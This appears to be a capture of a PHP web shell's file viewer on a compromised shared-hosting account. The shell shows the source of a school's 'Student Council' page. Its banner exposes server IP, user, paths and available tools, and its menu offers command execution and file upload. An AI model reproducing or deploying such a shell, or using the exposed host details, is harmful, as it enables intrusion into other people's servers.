|
1Server IP : 2a02:4780:11:1776:0:2637:29db:10 / Your IP : 216.73.217.24 Web Server : LiteSpeed System : Linux in-mum-web1676.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u641149403 ( 641149403) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0555) : /home/u641149403/domains/mistytourandtravel.in/../emrskalsi.com/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en" style="overflow-x: hidden;">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Eklavya Model Residential School - Student Council</title>
<?php include('include/header.php'); ?>
<div class="breadcrumbs">
<div class="container">
<!-- <h1 class="pull-left">
Student Council Members</h1> -->
<ul class="pull-left breadcrumb">
<li><a href="javascript:void(0)">Administration</a></li>
<li><a href="javascript:void(0)">Student Council</a></li>
</ul>
</div>
</div>
</div>
<style>.menshow{display:block !important}</style>
</div></div><div class="container-fluid" id="pr"><div class="col-xs-12 col-md-12 col-sm-12 col-lg-12" ><div class="ap-section ">
<div class="headline" id="headlines">
<h2>Student Council</h2>
</div>
<div class="ap-plain" >
<div >
<div class="table-responsive">
<table class="table table-bordered table-hover">
<thead>
<tr>
<th style="color: #ffffff; width: 83px;">S.No.</th>
<th style="color: #ffffff; width: 442px;">Name of Portfolio Holders </th>
<th style="color: #ffffff; width: 595px;">Name of the Student</th>
</tr>
</thead>
<tbody>
<?php
$q = "select * from student_council";
$query = mysqli_query($conn,$q);
$i=1;
while($res = mysqli_fetch_array($query)) { ?>
<tr>
<td><?php echo $i++; ?></td>
<td><?php echo $res['appointment'] ?></td>
<td><?php echo $res['name'] ?></td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
<div style="float: right;">
<p style="font-weight: bold;">(Dr. G.C. Badoni)
<br /> Principal</p>
</div></div>
</div>
</div></div></div>
<?php include('include/footer.php'); ?>